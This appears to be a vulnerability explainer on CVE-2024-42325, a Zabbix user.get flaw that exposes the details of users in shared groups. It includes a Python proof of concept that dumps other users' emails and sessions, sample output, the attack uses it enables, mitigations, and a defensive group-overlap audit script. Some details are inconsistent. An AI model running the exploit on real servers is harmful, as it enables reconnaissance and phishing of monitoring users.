CVE-2024-42325 - Zabbix User Enumeration and Sensitive Information Exposure via API
CVE-2024-42325 is a recently disclosed vulnerability affecting Zabbix, the popular open-source monitoring solution. The flaw lies in how the Zabbix API’s user.get method returns user information—allowing an authenticated user to retrieve details about *all* users who share a group with them. This includes sensitive information such as notification media, login attempts, and more. In this post, we’ll break down what this means, how it can be exploited, and give you code examples, references, and mitigation advice.
Understanding the Zabbix user.get API
The Zabbix API is a powerful tool for automating management of Zabbix resources. The user.get method is intended to fetch information about user accounts.
Zabbix uses a system of *user groups* for access control. However, due to improper authorization logic, a user who shares a group with others can retrieve substantial details about everyone in that group—regardless of their own privilege level.
What’s Exposed?
With CVE-2024-42325, anyone with a Zabbix API login—regardless of their own user role—can use the user.get API to enumerate all users in groups they belong to. This leak includes:
- The ‘active’ status
- Last login attempts (timestamps, IP addresses, success/failure)
With that data an attacker can:
- Enumerate valid usernames for credential attacks
- Obtain email/phone details for phishing/social engineering
Example: Exploiting the Leak
Let’s walk through a simple exploit using Python and the requests library.
Suppose you have credentials for a low-privilege monitoring user on a Zabbix installation.
Step 1: Authenticate and Get API Token
import requests
# Set your Zabbix URL (JSON-RPC endpoint)
url = "https://your.zabbix.instance/api_jsonrpc.php"
# Step 1: Login as low privilege user
login_payload = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {
"user": "lowprivuser",
"password": "password123"
},
"id": 1,
}
resp = requests.post(url, json=login_payload)
resp.raise_for_status()
# The session token returned by user.login is passed as "auth" in later calls
auth_token = resp.json()['result']
Step 2: Call user.get to Dump All Users in Common Groups
# Step 2: Dump user info (media, sessions, etc) for every user sharing a group with us
user_get_payload = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"output": "extend",
"selectMedias": "extend",
"selectUsrGrp": "extend",
"selectSessions": "extend"
},
"auth": auth_token,
"id": 2
}
user_resp = requests.post(url, json=user_get_payload)
user_resp.raise_for_status()
print(user_resp.json())
The above may return something like:
{
"jsonrpc": "2.0",
"result": [
{
"userid": "2",
"alias": "admin",
"name": "Super User",
"medias": [
{"mediaid": "1", "sendto": "admin@example.com", "active": true}
],
"sessions": [
{"lastaccess": 1685321482, "status": 0, "attempt_failed": 1}
]
},
{
"userid": "5",
"alias": "bob",
"name": "Bob Smith",
"medias": [
{"mediaid": "2", "sendto": "bob.smith@company.com", "active": true}
],
"sessions": [
{"lastaccess": 168532150, "status": 1, "attempt_failed": 0}
]
}
// ... more users ...
],
"id": 2
}
*Note*: All users in any group your API user belongs to will be included.
Security Implications
Unlike flaws that require a high level of access, CVE-2024-42325 lets any API user enumerate sensitive details just by virtue of group membership. Zabbix environments often use group sharing for operational convenience—increasing the risk.
This may be leveraged as follows:
- Reconnaissance: Identify administrators, operators, and their contact info for social engineering.
- Phishing Attacks: Use media info (email, phone) for targeted lures.
- Brute-force/Credential Stuffing: Knowing valid usernames helps attackers focus their attacks and evade detection.
- Tracking Usage Patterns: Session data shows who is active, which IPs connect, and how often failed logins occur.
References
- Zabbix: API user.get documentation
- CVE Record for CVE-2024-42325 (pending or see vendor advisory)
- Zabbix Release Notes – check for patch details
- Original Zabbix user.get Example
Mitigation
- Update: Patch to the latest version as soon as a fix is available.
- Minimize Group Overlap: Limit which users are in shared groups, especially with sensitive/admin accounts.
- Least Privilege: Assign the minimal API/user permissions necessary for each user.
- Monitoring: Watch API logs for unusual queries to user.get returning bulk data.
Vendor patch status can be checked at Zabbix’s official site.
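To act on the "Minimize Group Overlap" advice you first need to know which high-value accounts each low-privilege user can currently see. The script below is an added example, not part of the original post or of Zabbix: it takes group membership in the shape of a usergroup.get(selectUsers="extend") response (field names usrgrpid/name/users/userid/alias are assumed from the Zabbix API; the sample data and the HIGH_VALUE set are constructed) and reports, for every account, which sensitive accounts it would be able to enumerate through user.get under CVE-2024-42325 and which group causes the overlap.

```python
from collections import defaultdict

# Constructed sample shaped like a usergroup.get(selectUsers="extend") reply
# (assumption: usrgrpid/name/users/userid/alias as in the Zabbix API).
SAMPLE_GROUPS = [
    {"usrgrpid": "7", "name": "Zabbix administrators",
     "users": [{"userid": "1", "alias": "Admin"}, {"userid": "5", "alias": "bob"}]},
    {"usrgrpid": "12", "name": "Monitoring viewers",
     "users": [{"userid": "5", "alias": "bob"}, {"userid": "8", "alias": "lowprivuser"},
               {"userid": "9", "alias": "carol"}]},
    {"usrgrpid": "13", "name": "NOC",
     "users": [{"userid": "9", "alias": "carol"}, {"userid": "1", "alias": "Admin"}]},
]
# Hypothetical set of accounts whose media/session data would hurt most if leaked.
HIGH_VALUE = {"Admin", "bob"}


def visible_users(groups):
    """Map each alias to the aliases it shares at least one group with.

    Under CVE-2024-42325 this is the set user.get returns to that caller
    (the caller itself is left out here).
    """
    visible = defaultdict(set)
    for grp in groups:
        aliases = {u["alias"] for u in grp["users"]}
        for a in aliases:
            visible[a] |= aliases - {a}
    return dict(visible)


def exposed_high_value(groups, high_value):
    """For each caller, the sorted high-value accounts it could enumerate."""
    return {caller: sorted(seen & high_value)
            for caller, seen in visible_users(groups).items()}


def overlap_groups(groups, a, b):
    """Names of the groups that put a and b in each other's view."""
    return [g["name"] for g in groups
            if {a, b} <= {u["alias"] for u in g["users"]}]


if __name__ == "__main__":
    report = exposed_high_value(SAMPLE_GROUPS, HIGH_VALUE)
    for caller, targets in sorted(report.items()):
        for t in targets:
            print(f"{caller} can read {t} via {overlap_groups(SAMPLE_GROUPS, caller, t)}")
```

Accounts that appear in the report but should not be able to read a high-value user's media or sessions are the ones to move into a separate group; against a live server, replace SAMPLE_GROUPS with the parsed result of a usergroup.get call.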
Conclusion
CVE-2024-42325 is a classic example of how “insufficient authorization” can lead to much broader data leaks than expected. Zabbix users should take it seriously—this is an easy pathway for attackers with *any* credentials to map out high-value user accounts and sensitive information.
Patch promptly and review your group structures. Even better, monitor for unexpected API usage. For more technical details, follow the references above or watch security community channels for updates.
Stay safe, and keep your monitoring secure!
*This post is exclusive and based on current research into Zabbix API vulnerabilities as of June 2024.*
Timeline
Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC